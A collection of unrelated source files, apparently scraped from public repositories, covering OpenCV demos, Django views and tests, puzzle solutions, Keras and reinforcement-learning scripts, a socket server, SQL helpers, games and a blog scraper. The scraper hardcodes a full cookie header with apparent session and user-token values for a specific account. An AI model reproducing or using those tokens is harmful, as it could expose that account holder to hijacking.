cv2.setMouseCallback('image',draw_circle)\r\n#\r\n# while(1):\r\n# cv2.imshow('image',img)\r\n# k = cv2.waitKey(0) & 0xFF\r\n# if k == ord('m'):\r\n# mode = not mode\r\n# elif k == ord('q'):\r\n# break\r\n# cv2.destroyAllWindows()\r\n#\r\n#\r\n\r\n\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\n# events = [i for i in dir(cv2) if 'EVENT' in i]\r\n# print (events)\r\n\r\n\r\nfor i in dir(cv2):\r\n if 'EVENT' in i:\r\n # global events\r\n events = i\r\n\r\n print([events])\r\n\r\n\r\n\r\ndef draw_circle(event, x, y , flasgs, params):\r\n if event == cv2.EVENT_LBUTTONDBLCLK:\r\n cv2.circle(img, (x,y), 100, (255,0,0), -1)\r\n\r\n\r\nimg = np.zeros((512,512,3), 
np.uint8)\r\ncv2.namedWindow(\"image\")\r\ncv2.setMouseCallback('image', draw_circle)\r\n\r\n\r\nwhile(1):\r\n cv2.imshow('image', img)\r\n if cv2.waitKey(20) & 0xFF ==27:\r\n break\r\ncv2.destroyAllWindows\r\n\r\n\r\n\r\n","sub_path":"mouse_paint_brush.py","file_name":"mouse_paint_brush.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"488490632","text":"from django.conf import settings\nfrom django.test import TestCase\n\nfrom unittest import skipIf\n\nfrom geotrek.core.factories import TrailFactory, PathFactory\nfrom geotrek.authent.factories import UserFactory\nfrom geotrek.core.forms import TrailForm, PathForm\n\n\n@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')\nclass TopologyFormTest(TestCase):\n def test_save_form_when_topology_has_not_changed(self):\n user = UserFactory()\n topo = TrailFactory()\n form = TrailForm(instance=topo, user=user)\n self.assertEqual(topo, form.instance)\n form.cleaned_data = {'topology': topo}\n form.save()\n self.assertEqual(topo, form.instance)\n\n\nclass PathFormTest(TestCase):\n def test_overlapping_path(self):\n user = UserFactory()\n PathFactory.create(geom='SRID=4326;LINESTRING(3 45, 3 46)')\n # Just intersecting\n form1 = PathForm(\n user=user,\n data={'geom': '{\"geom\": \"LINESTRING(2.5 45.5, 3.5 45.5)\", \"snap\": [null, null]}'}\n )\n self.assertTrue(form1.is_valid(), str(form1.errors))\n # Overlapping\n form2 = PathForm(\n user=user,\n data={'geom': '{\"geom\": \"LINESTRING(3 45.5, 3 46.5)\", \"snap\": [null, null]}'}\n )\n self.assertFalse(form2.is_valid(), str(form2.errors))\n","sub_path":"geotrek/core/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"603140413","text":"from typing import List\n\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n l, r = 0, len(nums) - 1\n while l <= r:\n mid = l + (r-l) // 2\n if nums[mid] == target:\n return mid\n elif nums[mid] < target:\n l = mid + 1\n else:\n r = mid - 1\n return - 1\n\n\nif __name__ == \"__main__\":\n s = Solution()\n result = s.search([-1, 0, 3, 5, 9, 12], 9)\n print(result)\n","sub_path":"Algorithms/Easy/704. 
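In mouse_paint_brush.py above, the closing cv2.destroyAllWindows is missing its call parentheses, so the final statement only evaluates the function object and does nothing. The event loop with the call fixed, for reference:

import cv2
import numpy as np

img = np.zeros((512, 512, 3), np.uint8)
cv2.namedWindow('image')
while True:
    cv2.imshow('image', img)
    if cv2.waitKey(20) & 0xFF == 27:   # ESC exits the loop
        break
cv2.destroyAllWindows()                # with parentheses, so it actually runs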
Binary Search/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"399295329","text":"# 在原图上检验模型的定位效果\r\n\r\nimport os\r\nimport cv2\r\nimport keras\r\nimport numpy as np\r\n\r\nmodel_path = './models/loc_model/loc_model_20.h5'\r\ntest_img_path = './data/test/test2'\r\nwidth = 240\r\nheight = 27\r\nchannels_num = 3\r\n\r\n\r\ndef preprocess(src_img):\r\n norm_img = src_img / 255\r\n resize_img = cv2.resize(norm_img, (width, height))\r\n reshape_img = np.resize(resize_img, (height, width, channels_num))\r\n return reshape_img\r\n\r\n\r\ndef show_single_img():\r\n my_model = keras.models.load_model(model_path)\r\n my_model.summary()\r\n print(\"Successfully Load Model!\")\r\n for file in os.listdir(test_img_path):\r\n img = cv2.imread(os.path.join(test_img_path, file))\r\n print(file)\r\n h, w = img.shape[:2]\r\n cut_img = img[int(0.8 * h):, :]\r\n cut_img = preprocess(cut_img)\r\n input = np.expand_dims(cut_img, 0)\r\n result = my_model.predict(input)\r\n print(result)\r\n cv2.line(img, (0, int(0.8*h)), (w, int(0.8*h)), (255, 0, 0), 2)\r\n cv2.line(img, (0, int(h)-1), (w, int(h)-1), (255, 0, 0), 2)\r\n cv2.line(img, (int(result[0][0] * w), int(0.8 * h)), (int(result[0][3] * w), h), (255, 0, 0), 2)\r\n cv2.line(img, (int(result[0][1] * w), int(0.8 * h)), (int(result[0][2] * w), h), (255, 0, 0), 2)\r\n cv2.namedWindow(\"ttt\", cv2.WINDOW_NORMAL)\r\n cv2.imshow(\"ttt\", img)\r\n cv2.waitKey()\r\n\r\n\r\n# show_single_img()\r\ndef save_img_results():\r\n my_model = keras.models.load_model(model_path)\r\n my_model.summary()\r\n print(\"Successfully Load Model!\")\r\n for file in os.listdir(test_img_path):\r\n img = cv2.imread(os.path.join(test_img_path, file))\r\n print(file)\r\n img = cv2.resize(img, (1920, 1080))\r\n h, w = img.shape[:2]\r\n cut_img = img[int(0.8 * h):, :]\r\n cut_img = preprocess(cut_img)\r\n input = np.expand_dims(cut_img, 0)\r\n result = my_model.predict(input)\r\n print(result)\r\n cv2.line(img, (0, int(0.8*h)), (w, int(0.8*h)), (255, 0, 0), 2)\r\n cv2.line(img, (0, int(h)-1), (w, int(h)-1), (255, 0, 0), 2)\r\n cv2.line(img, (int(result[0][0] * 8), int(0.8 * h)), (int(result[0][3] * 8), h), (255, 0, 0), 2)\r\n cv2.line(img, (int(result[0][1] * 8), int(0.8 * h)), (int(result[0][2] * 8), h), (255, 0, 0), 2)\r\n cv2.imwrite(os.path.join(\"./results_on_src_imgs\", file), img)\r\n\r\nsave_img_results()","sub_path":"Ice_Thickness_Estimation/test_on_src_imgs.py","file_name":"test_on_src_imgs.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533461893","text":"from core.advbase import *\n\ndef module():\n return Ramona\n\nclass Ramona(Adv):\n conf = {}\n conf['slots.a'] = ['Summer_Paladyns', 'Primal_Crisis']\n conf['acl'] = \"\"\"\n `dragon(c3-s-s-end),s=1 and not s4.check()\n `s3, not buff(s3)\n `s2, s1.check()\n `s4, s=1\n `s1(all)\n \"\"\"\n conf['coabs'] = ['Gala_Sarisse', 'Wand', 'Marth']\n conf['share'] = ['Summer_Patia']\n\n @allow_acl\n def s(self, n, s1_kind=None):\n if n == 1 and s1_kind == 'all':\n self.current_s['s1'] = s1_kind\n else:\n self.current_s['s1'] = 'default'\n return super().s(n)\n\n def s1_do_hit(self, t):\n # reeeeeee fix ur shit cykagames\n with KillerModifier('s1_killer', 'hit', 0.3, ['burn']):\n Selfbuff(f'{t.name}_crit', 0.10, 10, 'crit', 'chance').on()\n self.dmg_make(t.name, 2.93/(1 + self.sub_mod('s', 'buff')))\n 
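preprocess() in test_on_src_imgs.py above forces the array shape with np.resize, which silently repeats or truncates elements when the sizes disagree — unlike ndarray.reshape, which raises on a mismatch and so surfaces a wrong crop immediately. A stricter variant, reusing the record's own shape constants:

import cv2
import numpy as np

WIDTH, HEIGHT, CHANNELS = 240, 27, 3

def preprocess(src_img: np.ndarray) -> np.ndarray:
    norm = src_img.astype(np.float32) / 255.0
    resized = cv2.resize(norm, (WIDTH, HEIGHT))      # -> (27, 240, 3)
    # reshape raises if the element count differs, instead of silently
    # repeating data the way np.resize does.
    return resized.reshape(HEIGHT, WIDTH, CHANNELS)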
self.add_combo(t.name)\n\n def s1_proc(self, e):\n if e.group != 'all':\n return\n for i in range(6):\n t = Timer(self.s1_do_hit)\n t.name = e.name\n t.on(i*0.5+0.5)\n\nif __name__ == '__main__':\n from core.simulate import test_with_argv\n test_with_argv(None, *sys.argv)\n","sub_path":"adv/ramona.py","file_name":"ramona.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"35147700","text":"from .api_settings import MAX_GROUPS\nfrom layer_map.models.catalog import LayerMeta\n\n\ndef add_metadata(obj, current, *args, **kwargs):\n try:\n metadata = obj.metadata.serialize()\n except (obj.DoesNotExist, LayerMeta.DoesNotExist):\n metadata = None\n\n current['metadata'] = metadata\n return current\n\n\ndef alter_id(obj, current, *args, **kwargs):\n current.update({'id': obj.id * MAX_GROUPS,\n 'real_id': obj.id})\n return current","sub_path":"layer_map/modifiers.py","file_name":"modifiers.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"573726993","text":"import re\r\nimport cx_Oracle, sqlite3, sqlalchemy\r\n\r\n\r\ndef format_connection_type(connection_type):\r\n \"\"\"\r\n Formatar entrada de tipo de conexão para uso nas funções de conexão a bancos de dados.\r\n \r\n inputs:\r\n :: connection_type [str ou list/tuple] -> tipo(s) de conexão a ser(em) retornado(s) | [\"connection\" (default), \"cursor\", \"engine\", \"all\"]\r\n\r\n output:\r\n :: [list] -> conexões formatadas para funções de conexão\r\n \"\"\" \r\n\r\n if isinstance(connection_type, str): # caso de ser string\r\n connection_type = connection_type.lower()\r\n if connection_type == 'all':\r\n connection_type = ['cc', 'engine']\r\n elif not connection_type in ['connection', 'cursor', 'engine']:\r\n print(f'invalid connection_type input: {connection_type}')\r\n raise ValueError\r\n else:\r\n connection_type = [connection_type]\r\n\r\n elif isinstance(connection_type, (list, tuple)): # se já for inserido list/tuple\r\n connection_type = list(set(connection_type)) # excluindo duplicatas\r\n\r\n for i, ct in enumerate(connection_type.copy()):\r\n try:\r\n ct = ct.lower()\r\n connection_type[i] = ct\r\n except AttributeError:\r\n print(f'invalid connection_type input: {ct}')\r\n raise ValueError\r\n if ct not in ['connection', 'cursor', 'engine']:\r\n print(f'invalid connection_type input: {ct}')\r\n raise ValueError\r\n\r\n connection_type.sort() \r\n if connection_type[:2] == ['connection', 'cursor']:\r\n connection_type = ['cc'] + connection_type[2:] # cc (connection/cursor) é unificado para garantir que o cursor retornado foi criado a partir da conexão também retornada \r\n \r\n return connection_type\r\n\r\n\r\ndef get_connection_type(connection_type, kwargs):\r\n\r\n if 'connection_type' in kwargs:\r\n connection_type = kwargs.pop('connection_type')\r\n elif not connection_type:\r\n connection_type = 'connection'\r\n elif len(connection_type) == 1:\r\n connection_type = connection_type[0]\r\n connection_type = format_connection_type(connection_type)\r\n return connection_type\r\n\r\n\r\ndef get_db_module_connectortype(sql_connector):\r\n \"\"\"\r\n A partir do objeto conector a banco de dados inserido, retorna-se o banco e o tipo de conexão\r\n\r\n inputs:\r\n :: connector [connector object] -> conector a um banco de dados\r\n\r\n output:\r\n :: [tuple de str] com (db, tipo de conexão) \r\n \"\"\"\r\n\r\n connector_class = 
re.search(r\"'(.+?)'\", str(type(sql_connector))).group(1).split('.')\r\n module, connector_type = connector_class[0].lower(), connector_class[-1].lower()\r\n if 'oracle' in module:\r\n db = 'oracle'\r\n elif 'sqlite' in module:\r\n db = 'sqlite'\r\n else:\r\n try:\r\n db = re.search(r\"(.+?)://\", str(sql_connector)).group(1).split('(')[1]\r\n except AttributeError:\r\n print(f'Conector inválido: {sql_connector}')\r\n raise\r\n return db, module, connector_type\r\n\r\n try:\r\n a = re.search(r\"^<(.+?) \", str(sql_connector)).group(1).split('.')[0]\r\n except AttributeError:\r\n try:\r\n a = re.search(r\"(.+?)://\", str(sql_connector)).group(1).split('(')[1]\r\n except AttributeError:\r\n print(f'Conector inválido: {sql_connector}')\r\n raise\r\n\r\n\r\ndef get_cursor(sql_connector):\r\n\r\n db, module, connector_type = get_db_module_connectortype(sql_connector)\r\n db, module, connector_type = db.lower(), module.lower(), connector_type.lower() \r\n\r\n implemented = ('cx_oracle', 'sqlite3', 'sqlalchemy')\r\n if module not in implemented:\r\n raise NotImplementedError\r\n if module == 'sqlalchemy':\r\n if connector_type == 'engine':\r\n cursor = sql_connector.connect()\r\n elif connector_type == 'connection':\r\n cursor = sql_connector\r\n else:\r\n if connector_type == 'connection':\r\n cursor = sql_connector.cursor()\r\n elif connector_type == 'cursor':\r\n cursor = sql_connector\r\n return cursor\r\n\r\n\r\ndef format_columns(**kwargs):\r\n\r\n cols_types = kwargs.get('cols_types')\r\n if not cols_types:\r\n cols = kwargs.get('cols', kwargs.get('columns'))\r\n types = kwargs.get('types')\r\n assert cols and types, 'Nomes de colunas (cols) e seus tipos (types) devem ser inseridos'\r\n assert len(cols) == len(types), 'cols e types devem ter o mesmo tamanho'\r\n cols_types = [' '.join(col_typ) for col_typ in zip(cols, types)]\r\n\r\n elif isinstance(cols_types, (list, tuple)):\r\n assert len(cols_types) > 0, 'Lista de colunas e tipos (cols_types) vazia'\r\n if isinstance(cols_types[0], (list, tuple)):\r\n assert len(cols_types[0]) == 2, f'Valor de cols_types[0] inválido: {cols_types[0]}'\r\n cols_types = [f'{col_typ[0]} {col_typ[1]}' for col_typ in cols_types]\r\n elif isinstance(cols_types[0], str):\r\n pass\r\n else:\r\n raise ValueError\r\n\r\n elif isinstance(cols_types, dict):\r\n cols_types = [f'{col} {typ}' for col, typ in cols_types.items()]\r\n \r\n else:\r\n raise ValueError\r\n\r\n return ', '.join([ct.upper() for ct in cols_types])\r\n\r\n\r\ndef get_types_pd2oracle(df, varchar_size=None):\r\n \"\"\"\r\n Helper para a inserção de um pd.DataFrame via cx_Oracle, traduzindo os tipos para\r\n o esperado pelo Oracle\r\n \"\"\"\r\n \r\n types = []\r\n for c, t in df.dtypes.items():\r\n if 'int' in str(t):\r\n types.append('integer')\r\n elif 'float' in str(t):\r\n types.append('float')\r\n elif 'object' in str(t):\r\n types.append(f'varchar({varchar_size if varchar_size else df[c].str.len().max() + 10})')\r\n elif 'date' in str(t):\r\n types.append('date')\r\n else:\r\n types.append(f'varchar({varchar_size if varchar_size else df[c].str.len().max() + 10})')\r\n return types\r\n\r\n\r\ndef list_chunks(lst, chunksize, idx=False):\r\n for i in range(0, len(lst), chunksize):\r\n if not idx:\r\n yield lst[i:i + chunksize]\r\n else:\r\n yield (i, i+chunksize)\r\n\r\n\r\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"146532151","text":"\"\"\"\nМодуль описывает базовую логику http сервера\n\"\"\"\n\nimport socket\nfrom interfaces.threaded.i_request_thread import IRequest\nfrom interfaces.threaded.i_response_thread import IResponse\nimport utils\nimport multiprocessing\nfrom datetime import datetime\n\n\nclass IServer:\n \"\"\"\n класс, определяющий базовый функционал для сервера\n \"\"\"\n\n port = None\n server_name = None\n _host = None\n _request = None\n _response = None\n _queue = None\n _process = []\n\n def __init__(self, host_name, port_id, server_name, request, response):\n IServer.port = port_id\n IServer.server_name = server_name\n IServer._host = host_name\n if not (utils.check_type(request, IRequest)):\n raise Exception('объект реквеста не соответствует заданным стандартам IRequest')\n if not (utils.check_type(response, IResponse)):\n raise Exception('объект респонса не соответствует заданным стандартам IResponse')\n IServer._request = request\n IServer._response = response\n # создадим очередь под максимальную нагрузку в 100 запросов\n IServer._queue = multiprocessing.Queue(100)\n\n\n @staticmethod\n def _task_listener(queue: multiprocessing.Queue):\n \"\"\"\n функция ожидающая задачи\n \"\"\"\n\n while True:\n if not queue.empty():\n task, args = queue.get()\n task(args)\n\n def serve_forever(self):\n \"\"\"\n главная функция по обслуживанию клиента\n \"\"\"\n\n serv_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n serv_sock.bind((self._host, self.port))\n serv_sock.listen()\n\n while True:\n conn, _ = serv_sock.accept()\n IServer._queue.put((IServer._serve_client, conn))\n \n finally:\n serv_sock.close()\n\n @staticmethod\n def _serve_client(conn):\n \"\"\"\n обслуживание запроса(обработка запроса, выполнение запроса, ответ клиенту)\n :param conn: соединение с клиентом\n \"\"\"\n\n try:\n request = IServer._parse_request(conn)\n response = IServer._handle_request(request)\n IServer._send_response(conn, response)\n except ConnectionResetError:\n conn = None\n except Exception as e:\n IServer._send_error(conn, e)\n\n if conn:\n conn.close()\n\n @staticmethod\n def _parse_request(conn):\n \"\"\"\n разбор запроса от клиента\n :param conn:\n :return: объект запроса\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def _handle_request(request):\n \"\"\"\n обработка запроса от клиента\n :return: данные для клиента\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def _send_response(conn, response):\n \"\"\"\n Отправка ответа клиенту\n :param conn: сокет\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def _send_error(conn, err):\n \"\"\"\n конструирование объекта ошибки и его отправка\n :param conn: сокет\n :param err: ошибка\n \"\"\"\n raise NotImplementedError\n","sub_path":"interfaces/multiprocessing/i_server.py","file_name":"i_server.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151811776","text":"def main():\n buses = inputAsList()[1].split(',')\n busTuples = []\n for i in range(len(buses)):\n if(buses[i] != 'x'):\n busTuples.append((int(buses[i]),i))\n increments = int(buses[0])\n alignedBuses = 1\n depTime = int(buses[0])\n while alignedBuses != len(busTuples):\n depTime += increments\n if((depTime+busTuples[alignedBuses][1])%busTuples[alignedBuses][0] == 0):\n increments *= int(busTuples[alignedBuses][0])\n alignedBuses+=1\n return depTime\n\ndef inputAsList():\n f = open('input')\n return f.read().splitlines()\n\nprint(\"Part 2: \" 
+ str(main()))","sub_path":"day13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286562864","text":"#!/usr/bin/env python\n# coding:utf-8\n\nfrom PIL import Image\nimport argparse\n\n\n# 设置字符个数\nascii_char = list(\"$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\\|()1{}[]?-_+~<>i!lI;:,\\\"^`'. \")\n\n\n# 参数设置\ndef set_args():\n # 设置参数输入格式\n parser = argparse.ArgumentParser(description=\"some information here\")\n parser.add_argument('file')\n parser.add_argument('--output', type=str, default='output.txt')\n parser.add_argument('--width', type=int, default=160)\n parser.add_argument('--high', type=int, default=60)\n\n # 获取参数\n args = parser.parse_args()\n file = args.file\n output = args.output\n width = args.width\n high = args.high\n return file, output, width, high\n\n\n# RGB值转字符的函数,将256灰度映射到70个字符上\ndef get_char(r, g, b, alpha=256):\n if alpha == 0:\n return ' '\n length = len(ascii_char)\n gray = int(0.2126*r + 0.7152*g + 0.0722*b)\n unit = (256.0+1)/length\n return ascii_char[int(gray/unit)]\n\n\n# 主函数\ndef img2charset(file, output, width, high):\n txt = \"\"\n im = Image.open(file)\n im = im.resize((width, high), Image.NEAREST)\n\n for h in range(high):\n for w in range(width):\n txt += get_char(*im.getpixel((w, h)))\n txt += '\\n'\n print(txt)\n\n with open(output, 'w') as f:\n f.write(txt)\n\n\nif __name__ == '__main__':\n img2charset(*set_args())\n","sub_path":"porject/Python图片转字符画/img2charset.py","file_name":"img2charset.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"324025064","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**7)\ninf = 10**17\nmod = 10**9+7\n\nk, x = map(int, input().split())\n\nif k * 500 >= x: print(\"Yes\")\nelse: print(\"No\")\n","sub_path":"atcorder/abc150/a/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"450775196","text":"# Copyright 2021 BlobCity, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom blobcity.store import DictClass\nfrom blobcity.utils import getDataFrameType,dataCleaner\nfrom blobcity.utils import AutoFeatureSelection as AFS\nfrom blobcity.main.modelSelection import model_search\nfrom blobcity.code_gen import yml_reader,code_generator\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.feature_selection import SelectKBest,f_regression,f_classif\ndef train(file=None, df=None, target=None,features=None,accuracy_criteria=0.99):\n \"\"\"\n param1: string: dataset file path \n\n param2: (optional) pandas.DataFrame object\n\n param3: string: target/dependent column name.\n\n param4: float: range[0.1,1.0] \n\n return: Model Class Object\n Performs a model search on the data proivded. 
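part2.py above is a sieved Chinese Remainder Theorem: once the first k buses align, they align again every lcm of their periods, so the search step can grow as each bus locks in — and because the puzzle's bus ids are pairwise coprime, multiplying the increment by each period is exactly that lcm. A toy run with made-up buses 7 and 13 at offsets 0 and 1:

buses = [(7, 0), (13, 1)]       # (period, offset) — illustrative values only
t, step = 0, 1
for period, offset in buses:
    while (t + offset) % period != 0:
        t += step               # stepping preserves all buses locked so far
    step *= period              # valid lcm only because 7 and 13 are coprime
print(t)                        # 77: 77 % 7 == 0 and (77 + 1) % 13 == 0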
A yaml file is generated once the best fit model configuration\n is discovered. The yaml file is later used for generating source code. \n\n Input to the function must be one of file or data frame (df). Passing both parameters of file and df in a single\n invocation is an incorrect use.\n \"\"\"\n dict_class=DictClass()\n dict_class.resetVar()\n #data read\n if file!=None:\n dataframe= getDataFrameType(file, dict_class)\n else: \n dataframe = df\n dict_class.addKeyValue('data_read',{\"type\":\"df\",\"class\":\"df\"})\n \n if(features==None):\n featureList=AFS.FeatureSelection(dataframe,target,dict_class)\n CleanedDF=dataCleaner(dataframe,featureList,target,dict_class)\n else:\n CleanedDF=dataCleaner(dataframe,features,target,dict_class)\n #model search space\n accuracy_criteria= accuracy_criteria if accuracy_criteria<=1.0 else (accuracy_criteria/100)\n modelClass = model_search(CleanedDF,target,dict_class,use_neural=False,accuracy_criteria=accuracy_criteria)\n modelClass.yamldata=dict_class.getdict()\n modelClass.feature_importance_=dict_class.feature_importance if(features==None) else calculate_feature_importance(CleanedDF.drop(target,axis=1),CleanedDF[target],dict_class)\n dict_class.resetVar()\n return modelClass\n\ndef load(modelFile,h5_path=None):\n \"\"\"\n param1: string: (required) the filepath to the stored model. Supports .pkl models.\n param2: string: the filepath to the stored h5 file, provide only if saved h5 file.\n returns: Model file\n\n function loads the serialized model from .pkl or .h5 format to usable format.\n \"\"\"\n path_components = modelFile.split('.')\n extension = path_components[1] if len(path_components)<=2 else path_components[2]\n \n if extension == 'pkl' and h5_path in [None,\"\"]:\n model = pickle.load(open(modelFile, 'rb'))\n\n \"\"\" elif os.path.splitext(h5_path)[1] == '.h5' and h5_path!=None:\n print(\"pkl path: {}, h5 path : {}\".format(os.path.splitext(modelFile),os.path.splitext(h5_path)))\n if os.path.splitext(h5_path)[0] == os.path.splitext(modelFile)[0]:\n tfmodel = tf.keras.models.load_model(h5_path)\n model=pickle.load(open(modelFile, 'rb'))\n model.model=tfmodel\n else:\n raise ValueError(\"file name for pickle and h5 file should be same\") \"\"\"\n return model\n\ndef spill(filepath,yaml_path=None,doc=None):\n \"\"\"\n param1:string : filepath and format of generated file to store. 
either .py or .ipynb\n param2:string : filepath of already generated YAML file \n param3:boolean : whether generate code along with documentation\n\n Function calls generator functions to generate source code for the AutoAI Procedure\n \"\"\"\n if yaml_path in [None,\"\"] : raise TypeError(\"YAML file path can't be None\")\n data=yml_reader(yaml_path)\n code_generator(data,filepath,doc)\n\ndef calculate_feature_importance(X,Y,dict_class):\n if X.shape[1]>2:\n score_func=f_classif if(dict_class.getdict()['problem'][\"type\"]=='Classification') else f_regression\n fit = SelectKBest(score_func=score_func, k=X.shape[1]).fit(X,Y)\n dfscores,dfcolumns = pd.DataFrame(fit.scores_),pd.DataFrame(X.columns)\n df = pd.concat([dfcolumns,dfscores],axis=1)\n df.columns = ['features','Score']\n df['Score']=MinMaxScaler().fit_transform(np.array(df['Score']).reshape(-1,1))\n imp=AFS.MainScore(dict(df.values),dict_class)\n return imp\n else:\n print('Dataset has only {} features, required atleast 2 for feature importances'.format(X.shape[1]))\n return None\n\n","sub_path":"blobcity/main/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":5060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"379018886","text":"import logging\nimport checker\nimport listener\n\n\nclass Detector(object):\n \"\"\"The detector class is the first layer where security alerts are being sent to analysis\"\"\"\n\n def __init__(self, init_checker):\n self._init_checker = init_checker\n self._default_subnet = \"10.0.0.0/24\"\n super(Detector, self).__init__()\n\n def start_detector(self):\n logging.info(\"Starting init detector\")\n self._init_checker.is_in_domain()\n self._init_checker.is_connected_to_internet()\n self._init_checker.get_all_usb_devices()\n self._init_checker.get_network_interfaces()\n\n @staticmethod\n def create_new_network_checker(network_subnet):\n logging.info(\"Creating new checker instance to scan network\")\n network_checker = checker.Checker(network_subnet)\n network_checker.devices_in_subnet()\n\n def create_new_listener(self):\n new_listener = listener.Listener(self._default_subnet)\n new_listener.start_mouse_listener()\n\n","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"264124347","text":"import cv2\nimport numpy as np\nimport argparse\n\ndef shape_detector(args: argparse.Namespace):\n img = cv2.imread(args.image)\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \n _, thresh = cv2.threshold(img_gray, 240, 255, cv2.THRESH_BINARY)\n contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\n white = np.ones((img.shape[0], img.shape[1], 3))\n\n for c in contours:\n approx = cv2.approxPolyDP(c, 0.01*cv2.arcLength(c, True), True)\n cv2.drawContours(img, [approx], 0, (0, 255, 0), 5)\n x = approx.ravel()[0]\n y = approx.ravel()[1] - 5\n if len(approx) == 3:\n cv2.putText(img, \"Triangle\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n elif len(approx) == 4:\n x1, y1, w, h = cv2.boundingRect(approx)\n aspect_ratio = float(w) / float(h)\n print(aspect_ratio)\n if aspect_ratio >= 0.95 and aspect_ratio <= 1.05:\n cv2.putText(img, \"Square\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n else:\n cv2.putText(img, \"Rectangle\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n elif len(approx) == 5:\n cv2.putText(img, \"Pentagon\", (x, y),\n 
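calculate_feature_importance() in the blobcity driver above boils down to univariate ANOVA scores rescaled into a 0-1 importance map; stripped of the DictClass bookkeeping, the core looks like this sketch on a stock dataset:

import pandas as pd
from sklearn.datasets import load_iris
from sklearn.feature_selection import SelectKBest, f_classif
from sklearn.preprocessing import MinMaxScaler

X, y = load_iris(return_X_y=True, as_frame=True)
fit = SelectKBest(score_func=f_classif, k=X.shape[1]).fit(X, y)

scores = pd.DataFrame({'features': X.columns, 'Score': fit.scores_})
# Rescale raw F-scores into [0, 1] so features are comparable at a glance.
scores['Score'] = MinMaxScaler().fit_transform(scores[['Score']])
print(scores.sort_values('Score', ascending=False))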
cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n elif len(approx) == 10:\n cv2.putText(img, \"Star\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n else:\n cv2.putText(img, \"Circle\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n\n cv2.imshow(\"Shapes\", img)\n cv2.waitKey()\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--image\", default=\"\", type=str, help=\"Image file\")\n args = parser.parse_args()\n shape_detector(args)\n","sub_path":"Day 7/shape_recognition/shape_reconition.py","file_name":"shape_reconition.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615659630","text":"# -*- coding: utf-8 -*-\r\n# /usr/bin/python2\r\n'''\r\n2019-04-10 by zhangshuyuan.\r\n'''\r\n\r\nimport tensorflow as tf\r\nimport datetime\r\n\r\nclass ModelBase():\r\n def __init__(self,type):\r\n self.__type = type\r\n\r\n def predict(self,sentence):\r\n return sentence\r\n\r\n def batch_predict(self,sentences):\r\n return sentences\r\n\r\nclass CorrectModel(ModelBase):\r\n def __init__(self,type,model_path,input_len,output_len,batch_size):\r\n ModelBase.__init__(self,type)\r\n self.__batch_size = batch_size\r\n self.__path = model_path\r\n self.__vocab_file = '/bpe.vocab'\r\n word2idx,idx2word = 